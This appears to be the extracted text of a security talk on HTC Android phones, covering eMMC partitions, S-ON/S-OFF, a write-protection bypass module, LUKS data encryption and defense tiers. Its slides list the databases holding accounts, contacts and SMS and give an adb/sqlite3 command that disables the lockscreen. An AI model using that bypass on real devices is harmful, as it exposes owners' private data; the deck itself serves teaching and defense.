Android behind the
     scenes
   possible attacks
  and radical defense
       measures
•   /dev/block/mmcblk0p1 - 512 000 - dbl
•   /dev/block/mmcblk0p3 - 4 608 000 - osbl
•   /dev/block/mmcblk0p4 - 1 024 - header_rex_amss
•   /dev/block/mmcblk0p5 - 30 720 000 - rex_amss
•   /dev/block/mmcblk0p6 - 12 800 000 - modem_DSP
•   /dev/block/mmcblk0p7 - 2 097 152 - CID, Secure_Flag, IMEI, rcdata.img
•   /dev/block/mmcblk0p8 - 3 145 728
•   /dev/block/mmcblk0p9 - 2 097 152
•   /dev/block/mmcblk0p10 - 1 048 576
•   /dev/block/mmcblk0p11 - 1 048 576
•   /dev/block/mmcblk0p12 - 8 961 536
•   /dev/block/mmcblk0p13 - 3 145 728 - reserved for modem storage
•   /dev/block/mmcblk0p14 - 3 145 728 - reserved for modem storage
•   /dev/block/mmcblk0p15 - 1 048 576
•   /dev/block/mmcblk0p16 - 9 172 480
•   /dev/block/mmcblk0p17 - 262 144 - misc
•   /dev/block/mmcblk0p18 - 1 048 576 - hboot
•   /dev/block/mmcblk0p19 - 1 048 576 - sp1
•   /dev/block/mmcblk0p20 - 1 310 720 - wifi
•   /dev/block/mmcblk0p21 - 8 909 824 - recovery
•   /dev/block/mmcblk0p22 - 4 194 304 - boot
•   /dev/block/mmcblk0p23 - 262 144 - mfg
•   /dev/block/mmcblk0p24 - 2 096 128 - sp2
•   /dev/block/mmcblk0p25 - 585 104 896 - system
•   /dev/block/mmcblk0p26 - 1 232 076 288 - userdata
•   /dev/block/mmcblk0p27 - 314 572 288 - cache
•   /dev/block/mmcblk0p28 - 21 757 440 - devlog
•   /dev/block/mmcblk0p29 - 262 144 - pdata
S-ON:
• eMMC read; writing only to user-available partitions
• Flashing only HTC-signed firmware

S-OFF:
• Writing to any eMMC partition, except partition 7
• Flashing any third-party modified firmware, including hboot, recovery and custom ROMs
mmcblk0p7

              CID
             IMEI
            S-Flag
IMEI repair

S-OFF

Unlock
Powercycle           Partition7
 gfree   wpthis.ko
                                   eMMC               injection




              /*
               * powercycle_emmc - drive GPIO 88 low, then high again.
               *
               * The slide labels this listing "wpthis.ko". The pin is first set up
               * through gpio_tlmm_config() with the flags GPIO_OUTPUT, GPIO_NO_PULL
               * and GPIO_2MA, then written 0 and 1 in turn, with a 200 ms mdelay()
               * after each write.
               *
               * NOTE(review): that GPIO 88 gates power to the eMMC is implied only by
               * the function name; the listing does not show the board wiring.
               */
              void powercycle_emmc()
              {
                  enum { EMMC_GPIO = 88, DELAY_MS = 200 };
                  static const int levels[] = { 0, 1 };   /* off first, then back on */
                  unsigned int step;

                  gpio_tlmm_config(PCOM_GPIO_CFG(EMMC_GPIO, 0, GPIO_OUTPUT, GPIO_NO_PULL, GPIO_2MA), 0);

                  /* Same order as the original listing: write the level, then wait. */
                  for (step = 0; step < sizeof(levels) / sizeof(levels[0]); step++) {
                      gpio_set_value(EMMC_GPIO, levels[step]);
                      mdelay(DELAY_MS);
                  }
              }
drivers/mmc/card/block.c



#if 1                                #if 0
if (board_emmc_boot())
  if (mmc_card_mmc(card)) {
    if (brq.cmd.arg < 131073) {/* should not write any value before
131073 */
      pr_err("%s: pid %d(tgid %d)(%s)n", func, (unsigned)(current->pid),
             (unsigned)(current->tgid), current->comm);
      pr_err("ERROR! Attemp to write radio partition start %d size %dn",
              brq.cmd.arg, blk_rq_sectors(req));

    BUG();
    return 0;
   }
#endif
Preparations

Android 2.3-4.1
• Rooted Android OS, stock or custom

Busybox
• Android console utility pack installed

lm.cryptsetup
• Android console LUKS-manager
  installed

USB Debugging Enabled
• Access to device’s shell by USB

“reboot” binary
• Reboot binary from the ROM
  Manager contents
In the Android Shell:
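#busybox dd if=/dev/zero of=/data/secure0 bs=1M count=800
#losetup /dev/block/loop3 /data/secure0
#lm.cryptsetup luksFormat -c aes-plain /dev/block/loop3
(Note: cryptsetup normally reads "aes-plain" as aes-cbc-plain, whose IV is the predictable sector number; where the kernel supports them, aes-cbc-essiv:sha256 or aes-xts-plain64 avoid the resulting watermarking weakness.)
#lm.cryptsetup luksOpen /dev/block/loop3 data
#mke2fs -T ext4 -L Secure0 -F /dev/mapper/data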
#lm.cryptsetup luksClose data

In the CWM Recovery:
parted /dev/block/mmcblk1
print
rm 1
mkpartfs primary fat32 0 4032
mkpartfs primary ext2 4032 8065
quit

     In the Android Shell:
     #lm.cryptsetup luksFormat -c aes-plain /dev/block/mmcblk1p2
     #lm.cryptsetup luksOpen /dev/block/mmcblk1p2 sdcard
     #mkfs.vfat -n Seccard0 /dev/mapper/sdcard
     #lm.cryptsetup luksClose sdcard
In the Android Shell:
#losetup /dev/block/loop3 /data/secure0
#lm.cryptsetup luksOpen /dev/block/loop3 data
#mount -o remount,rw /
#mkdir /DATA
#mount -t ext4 /dev/mapper/data /DATA
# cp -a /data/app /DATA
# cp -a /data/app-private /DATA
# cp -a /data/backup /DATA
# cp -a /data/data /DATA
# cp -a /data/dontpanic /DATA
# cp -a /data/drm /DATA
# cp -a /data/etc /DATA
# cp -a /data/htcfs /DATA
# cp -a /data/local /DATA
# cp -a /data/misc /DATA
# cp -a /data/property /DATA
# cp -a /data/secure /DATA
# cp -a /data/system /DATA
# cp -a /data/zipalign.log /DATA
# mkdir /DATA/d
# mkdir /DATA/dalvik-cache
# umount /DATA
# lm.cryptsetup luksClose data
Entering encrypted mode:
#setprop ctl.stop zygote
#mount -o remount,rw rootfs /
#mkdir /DATA
#mkdir /mnt/SDCARD
#mount -o move /mnt/sdcard /mnt/SDCARD
#lm.cryptsetup luksOpen /dev/block/mmcblk1p2 sdcard
#mount -t vfat /dev/mapper/sdcard /mnt/sdcard
#mount -o remount,ro rootfs /
#mount /dev/block/mmcblk0p26 /DATA
#losetup /dev/block/loop5 /DATA/secure0
#lm.cryptsetup luksOpen /dev/block/loop5 data
#umount /data -l
#mount -t ext4 /dev/mapper/data /data
#setprop ctl.start zygote
#killall zygote

Leaving encrypted mode:
#sync
#setprop ctl.stop zygote
#setprop ctl.stop runtime
#setprop ctl.stop keystore
#fuser /data -m -k
#umount /data
#/lm.cryptsetup luksClose data
#/system/bin/reboot
CWM
S-ON   S-OFF              ADB   #Root   /data/
               recovery
/data/system/accounts.db



     /data/data/com.android.providers.contacts/databases/contacts2.db
     • Contacts
     • Call history



     /data/data/com.android.providers.telephony/databases/mmssms.db
     • Sms
adb shell
# sqlite3 /data/data/com.android.providers.settings/databases/settings.db
sqlite> update secure set value=65536 where name='lockscreen.password_type';
sqlite> .exit
# exit
adb reboot
Basic:
• USB Debugging disabled
• Unknown Sources Off
• PinLock

Moderate:
• S-ON
• Stock Firmware

Recommended:
• Data Encryption
Thank you for listening!
     See you next time.

Android: Behind the scenes

  • 1. Android behind the scenes possible attacks and radical defense measures
  • 2.
  • 3. /dev/block/mmcblk0p1 - 512 000 - dbl • /dev/block/mmcblk0p3 - 4 608 000 - osbl • /dev/block/mmcblk0p4 - 1 024 - header_rex_amss • /dev/block/mmcblk0p5 - 30 720 000 - rex_amss • /dev/block/mmcblk0p6 - 12 800 000 - modem_DSP • /dev/block/mmcblk0p7 - 2 097 152 - CID, Secure_Flag, IMEI, rcdata.img • /dev/block/mmcblk0p8 - 3 145 728 • /dev/block/mmcblk0p9 - 2 097 152 • /dev/block/mmcblk0p10 - 1 048 576 • /dev/block/mmcblk0p11 - 1 048 576 • /dev/block/mmcblk0p12 - 8 961 536 • /dev/block/mmcblk0p13 - 3 145 728 - reserved for modem storage • /dev/block/mmcblk0p14 - 3 145 728 - reserved for modem storage • /dev/block/mmcblk0p15 - 1 048 576 • /dev/block/mmcblk0p16 - 9 172 480 • /dev/block/mmcblk0p17 - 262 144 - misc • /dev/block/mmcblk0p18 - 1 048 576 - hboot • /dev/block/mmcblk0p19 - 1 048 576 - sp1 • /dev/block/mmcblk0p20 - 1 310 720 - wifi • /dev/block/mmcblk0p21 - 8 909 824 - recovery • /dev/block/mmcblk0p22 - 4 194 304 - boot • /dev/block/mmcblk0p23 - 262 144 - mfg • /dev/block/mmcblk0p24 - 2 096 128 - sp2 • /dev/block/mmcblk0p25 - 585 104 896 - system • /dev/block/mmcblk0p26 - 1 232 076 288 - userdata • /dev/block/mmcblk0p27 - 314 572 288 - cache • /dev/block/mmcblk0p28 - 21 757 440 - devlog • /dev/block/mmcblk0p29 - 262 144 - pdata
  • 4. S-ON: eMMC read; writing only to user-available partitions. Flashing only HTC-signed firmware. S-OFF: Writing to any eMMC partition, except partition 7. Flashing any third-party modified firmware, including hboot, recovery and custom ROMs.
  • 5. mmcblk0p7 CID IMEI S-Flag
  • 7. Powercycle Partition7 gfree wpthis.ko eMMC injection •void powercycle_emmc() { gpio_tlmm_config(PCOM_GPIO_CFG(88, 0, GPIO_OUTPUT, GPIO_NO_PULL, GPIO_2MA), 0); // turn off. wpthis.ko gpio_set_value(88, 0); mdelay(200); // turn back on. gpio_set_value(88, 1); mdelay(200); }
  • 8. drivers/mmc/card/block.c #if 1 #if 0 if (board_emmc_boot()) if (mmc_card_mmc(card)) { if (brq.cmd.arg < 131073) {/* should not write any value before 131073 */ pr_err("%s: pid %d(tgid %d)(%s)n", func, (unsigned)(current->pid), (unsigned)(current->tgid), current->comm); pr_err("ERROR! Attemp to write radio partition start %d size %dn", brq.cmd.arg, blk_rq_sectors(req)); BUG(); return 0; } #endif
  • 9.
  • 10. Preparations Android 2.3-4.1 • Rooted Android OS, stock or custom Busybox • Android console utility pack installed lm.cryptsetup • Android console LUKS-manager installed USB Debugging Enabled • Access to device’s shell by USB “reboot” binary • Reboot binary from the ROM Manager contents
  • 11. In the Android Shell: #busybox dd if=/dev/zero of=/data/secure0 bs=1M count=800 #losetup /dev/block/loop3 /data/secure0 #lm.cryptsetup luksFormat -c aes-plain /dev/block/loop3 #lm.cryptsetup luksOpen /dev/block/loop3 data #mke2fs -T ext4 -L Secure0 -F /dev/mapper/data #lm.cryptsetup luksClose data In the CWM Recovery: parted /dev/block/mmcblk1 print rm 1 mkpartfs primary fat32 0 4032 mkpartfs primary ext2 4032 8065 quit In the Android Shell: #lm.cryptsetup luksFormat -c aes-plain /dev/block/mmcblk1p2 #lm.cryptsetup luksOpen /dev/block/mmcblk1p2 sdcard #mkfs.vfat -n Seccard0 /dev/mapper/sdcard #lm.cryptsetup luksClose sdcard
  • 12. In the Android Shell: #losetup /dev/block/loop3 /data/secure0 #lm.cryptsetup luksOpen /dev/block/loop3 data #mount -o remount,rw / #mkdir /DATA #mount -t ext4 /dev/mapper/data /DATA # cp -a /data/app /DATA # cp -a /data/app-private /DATA # cp -a /data/backup /DATA # cp -a /data/data /DATA # cp -a /data/dontpanic /DATA # cp -a /data/drm /DATA # cp -a /data/etc /DATA # cp -a /data/htcfs /DATA # cp -a /data/local /DATA # cp -a /data/misc /DATA # cp -a /data/property /DATA # cp -a /data/secure /DATA # cp -a /data/system /DATA # cp -a /data/zipalign.log /DATA # mkdir /DATA/d # mkdir /DATA/dalvik-cache # umount /DATA # lm.cryptsetup luksClose data
  • 13. Entering encrypted mode: #setprop ctl.stop zygote #mount -o remount,rw rootfs / #mkdir /DATA #mkdir /mnt/SDCARD #mount -o move /mnt/sdcard /mnt/SDCARD #lm.cryptsetup luksOpen /dev/block/mmcblk1p2 sdcard #mount -t vfat /dev/mapper/sdcard /mnt/sdcard #mount -o remount,ro rootfs / #mount /dev/block/mmcblk0p26 /DATA #losetup /dev/block/loop5 /DATA/secure0 #lm.cryptsetup luksOpen /dev/block/loop5 data #umount /data -l #mount -t ext4 /dev/mapper/data /data #setprop ctl.start zygote #killall zygote Leaving encrypted mode: #sync #setprop ctl.stop zygote #setprop ctl.stop runtime #setprop ctl.stop keystore #fuser /data -m -k #umount /data #/lm.cryptsetup luksClose data #/system/bin/reboot
  • 14.
  • 15. CWM S-ON S-OFF ADB #Root /data/ recovery
  • 16.
  • 17. /data/system/accounts.db /data/data/com.android.providers.contacts/databases/contacts2.db • Contacts • Call history /data/data/com.android.providers.telephony/databases/mmssms.db • Sms
  • 18. adb shell # sqlite3 /data/data/com.android.providers.settings/databases/settings.db sqlite> update secure set value=65536 where name='lockscreen.password_type'; sqlite> .exit # exit adb reboot
  • 19. Basic: USB Debugging disabled, Unknown Sources Off, PinLock. Moderate: S-ON, Stock Firmware. Recommended: Data Encryption.
  • 20. Thank you for listening! See you next time.